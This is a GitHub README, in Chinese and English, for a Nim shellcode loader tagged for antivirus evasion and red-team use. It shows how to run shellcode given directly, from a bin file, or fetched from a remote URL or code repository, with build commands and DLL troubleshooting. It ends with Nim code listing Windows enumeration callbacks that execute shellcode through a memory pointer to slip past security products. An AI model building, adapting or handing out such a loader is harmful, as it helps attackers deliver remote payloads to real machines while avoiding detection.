Skip to content

nim,免杀,红队,shellcode,bypass,apt,bypass-av.

Notifications You must be signed in to change notification settings

sh3d0ww01f/nim_shellloader

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

29 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

nim_shellloader

详见以下: details:

usage

loader.exe payload.bin
loader.exe  (yourshellcode)
loader.exe (http://xxxx/xxx)

put your url/bin/shellcode direct 后面直接跟shellcode内容 或者bin文件名 或者网址就行

①use shellcode:

②use bin file

使用bin文件加载shellcode

③ load the shellcode which on your server(remote load) 加载你服务器上的shellcode

Besides,You can load shellcode which on your reposiotory(gitee,github,etc.) like this

此外 你还可以把shellcode放在github,gitee的地方让loader去读

Notice:You must remove '\x' on your shellcode

注意:你必须去除你shellcode中的 \x

查杀情况

编译 compile

step1: setup require 安装所需的库

nimble install https://github.com/khchen/winim
nimble install https://github.com/status-im/nim-stew

step2: generate exe 生成exe

nim c --cpu:i386 -d:mingw -d:ssl --opt:size shellcode_loader.nim

Advise 建议

windows上编译容易出现玄学问题 可以用debian11交叉编译 不过记得要装mingw

It's easy to have problem if you compile it on Windows Platform.In my opion,you'd better compile it on Linux

如果出现 :could not load:(libcrypto-1_1|libeay32).dll If Go wrong with :could not load:(libcrypto-1_1|libeay32).dll

考虑是运行的平台问题 因为编译的时候i386是x86的 所以出现这个问题就把i386换成amd64

I consider this is because of the wrong command(it didn't match target's platform ),so please change "i386" to "amd64",like following

nim c --cpu:amd64 -d:mingw -d:ssl --opt:size shellcode_loader.nim

If it is compiled on windows, you don't need to add -d:mingw

如果是windows上编译 则可以不用加-d:mingw

你可能会在运行这个加载器上出现问题 如果你出现

It's possible that the shellcode_loader will go wrong with:

could not load: (libcrypto-1_1-x64|libeay64).dll

你可能需要解决这些库

That means you maybe need to solve these dll

libcrypto-1_1-x64.dll

libenchant.dll

libpq.dll

libsasl.dll

libsodium.dll

libssh2.dll

libssl-1_1-x64.dll

You can find them under the floder which belong to PHP

这些库可以在windows下 php环境中找到

Also , you can download them on the Internet 也可以从网上下载

源码中的EnumSystemGeoID回调函数可以换成以下函数 等价

The callback function named "EnumSystemGeoID" in my source can be replaced with following function

# Callback execution
    EnumSystemGeoID(GEOCLASS_NATION,0,cast[GEO_ENUMPROC](rPtr)) #①
    EnumChildWindows(cast[HWND](nil),cast[WNDENUMPROC](rPtr),cast[LPARAM](nil))#②
    EnumDateFormatsA(cast[DATEFMT_ENUMPROCA](rPtr) , LOCALE_SYSTEM_DEFAULT, cast[DWORD](0))#③
    EnumDesktopsW(GetProcessWindowStation(),cast[DESKTOPENUMPROCW](rPtr), cast[LPARAM](nil))#④
    EnumDesktopWindows(GetThreadDesktop(GetCurrentThreadId()),cast[WNDENUMPROC](rPtr), cast[LPARAM](nil))#⑤
    EnumSystemCodePagesA(cast[CODEPAGE_ENUMPROCA](rPtr) ,0)#⑥
    EnumSystemCodePagesW(cast[CODEPAGE_ENUMPROCW](rPtr), CP_INSTALLED)#⑦
    EnumSystemLanguageGroupsA(cast[LANGUAGEGROUP_ENUMPROCA](rPtr),LGRPID_SUPPORTED,0)#⑧
    EnumSystemLocalesA(cast[LOCALE_ENUMPROCA](rPtr) ,nil)#⑨
    EnumThreadWindows(0,csat[WNDENUMPROC](rPtr),0) #⑩
    EnumUILanguagesA(cast[UILANGUAGE_ENUMPROCA](rPtr), MUI_LANGUAGE_ID, 0)#11
    EnumWindows(cast[WNDENUMPROC](rPtr), cast[LPARAM](nil))#12